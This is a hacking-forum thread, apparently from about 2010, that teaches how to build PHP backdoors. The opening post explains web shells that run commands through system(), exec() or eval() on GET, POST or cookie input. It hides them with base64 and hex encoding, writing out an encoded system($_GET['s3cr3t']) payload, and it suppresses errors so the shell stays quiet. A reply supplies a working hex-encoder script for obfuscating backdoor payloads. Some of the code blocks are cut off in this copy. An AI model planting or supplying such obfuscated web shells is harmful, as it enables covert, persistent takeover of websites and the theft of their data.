| Web Hacking & War Games Discuss f.ex. SQL injection and legal hacking here. |
#1
| ||||
| ||||
| Creating Backdoors in PHP
Dear members and guests of InterN0T, This is a small tutorial to how One could make backdoors in PHP. The reason why a backdoor may be needed could be if your site gets hacked but if there's no protection on the backdoor and if a hacker finds that backdoor then your site may get hacked that way too, so be careful with these examples. First we need to know which functions we can use: - System(); // Executes an external program. - Exec(); // Executes an external program. - Fopen(); // Opens a file on the system. - Include(); // Includes a file to be executed. - Eval(); // Executes PHP code. With that in mind, we move over to how the backdoor can receive input: - $_GET['var']; // Receives input like: file.php?var=command - $_POST['var']; // Receives input via the POST-parameter. (LiveHTTPHeaders can be used). - $_COOKIE['var']; // Receives input via browser-cookies. Now we might want to encode the backdoor, a few ways are: - Base64 encoding (base64_encode() is a builtin function). - Encode it like shellcode: "\xDE\xAD\xBE\xEF"; - And possibly many more ways! So lets say you want to create a backdoor which uses: - system() + $_GET[] + base64_encode() Before encoding anything we write the code that we want to be executed: PHP Code: In order to encode it we can either use an application or do it ourselves: <?php $var = "system(\$_GET['s3cr3t']);"; // $ needs to be escaped. echo base64_encode($var); ?> Which results in: c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7 In order to execute it we need the following PHP code: PHP Code: included in all the time. Otherwise it will send an error to the site because system() can't handle empty requests. In order to bypass this issue we could use: error_reporting(0); in our script. But that results in a lot more code! So why not use some- thing easier such as @ before the command? This should supress all warnings, from system() only of course. Without encoding the backdoor the code would look like: PHP Code: that many problems with PHP backdoors yet since it would be a pain to check anything you might want to use, for backdoors. Our backdoor is at this stage very simple but also very small. One of the first things to implement after using system() or exec() would be sending the output to <pre></pre> tags so the output is easy to read which is a good idea when using PHP backdoors. The other commands we can use, fopen() and include() in short may be used for LFI and perhaps RFI (depending on php.ini settings). Eval() can be used to execute PHP code directly which would probably be one of the most effective backdoors if the hacker, knows PHP of course! That's basicly it of what you could or should know about PHP backdoors at the moment. ![]() Update: I've recently had some more cool ideas (which are hard to implement, yet more stealthy). I will write about them as soon as I am done with my other projects (I have many at the moment and there is a lot of testing with my new ideas). Meanwhile I also created a better application in PHP for creating and encoding backdoors! Application Link: HaXxd00r Best regards, MaXe
__________________ ![]() Quote:
Last edited by MaXe; 20th February 2010 at 21:17. |
|
#2
| ||||
| ||||
| Re: Creating Backdoors in PHP
nice! :) I've considered this before, but never really thought about base64 encoding it. Thanks for sharing. I'll look forward to see more of this coming? ;) +rep
__________________ I asked God for a bike, but I know God doesn't work that way. So I stole a bike and asked for forgiveness. |
|
#3
| |||
| |||
| Re: Creating Backdoors in PHP
I see a lot of php backdoors in nulled scripts and website templates. They mostly use base64 to encode thier scripts but i have seen commercial encoders being used which are a little more complicated to decode.
|
|
#4
| ||||
| ||||
| Re: Creating Backdoors in PHP
Here's a Hex Encoder which should output the string as valid hex- encoding to be used in f.ex. PHP backdoors, Cross Site Scripting etc. Please keep in mind that I haven't tested it, I just wrote it in notepad at work. Code: <?php
/**
* Hex Encoder 1.0 made by MaXe - Founder of InterN0T.net
**/
$usr_input = isset($_GET['text']) ? $_GET['text'] : $_GET['text']="";
if($usr_input=="") {
echo '
<html>
<head>
<title>HeX Encoder</title>
</head>
<body>
<br />
<center>
<h3>Input a string to encode</h3><br />
<form action="?" method="GET">
<input type="text" name="text" value="" />
<input type="submit" value="Encode" />
</form>
</center>
</body>
</html>
';
} else {
echo '
<html>
<head>
<title>HeX Encoder</title>
</head>
<body>
<br />
<center>
<h3>Use the output below for your PHP backdoor:</h3><br />
HexEncode($usr_input);
<br /><br />
For example, this should work: <br />
eval("'. HexEncode($usr_input); .'");
</center>
</body
</html>
';
}
function HexEncode($String) {
for ($i = 0; $i < strlen($String); $i++)
{
$HexChar = bin2hex($String[$i]);
echo "\\x" .$HexChar;
}
}
?>
\xDE\xAD\xBE\xEF etc and also give an example of how it can be used like: eval("\xDE\xAD\xBE\xEF"); I might make an encoder for PHP backdoors in the future, just for fun xD
__________________ ![]() Quote:
Last edited by MaXe; 2nd February 2010 at 16:45. |
|
#5
| ||||
| ||||
| Re: Creating Backdoors in PHP
Nice script, just the ';' which must be deleted line 41 after the function call ;)
|
|
#6
| ||||
| ||||
| Re: Creating Backdoors in PHP
Nice app u made there MaXe. xD
__________________ I live in cmd, so don't bother me asking for dir. |
|
#7
| ||||
| ||||
| Re: Creating Backdoors in PHP
__________________ ![]() Quote:
|
|
#9
| |||
| |||
| Re: Creating Backdoors in PHP
Great! But how can we use this! Can you explain! thanks :) |
|
#10
| ||||
| ||||
| Re: Creating Backdoors in PHP
Nice. The only darkside of a backdoor in PHP is that we can't use it in free hosting services, which doesn't allow to use system(), exec() functions. Anyway, it remains one of the best technique used in this world, so , good work ;)
__________________ It's just my mind |
![]() |
| Bookmarks |
| Thread Tools | |
| Display Modes | |
| |
LinkBacks (?)
LinkBack to this Thread: http://forum.intern0t.net/web-hacking-war-games/2192-creating-backdoors-php.html | ||||
| Posted By | For | Type | Date | |
| What are PHP backdoors? - Zoklet.net | This thread | Refback | 12th June 2010 20:34 | |
| HackTalk - Your Micro-Social Network | This thread | Refback | 31st January 2010 12:03 | |
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| [Question] Backdoors. | Seeker | General Hacking Discussions | 16 | 15th September 2009 10:28 |
| Creating and working with dll's | Tsukasa | C# // .NET | 0 | 26th January 2009 02:42 |
| Creating bootable USB drives for capturing the contents of memory | Drathnar | General Security Discussions | 1 | 12th November 2008 09:42 |
| creating malicious images | HybriD | Offensive Guides & Information | 5 | 11th October 2008 20:36 |
| Backdoors | Drathnar | Offensive Guides & Information | 1 | 30th September 2008 16:25 |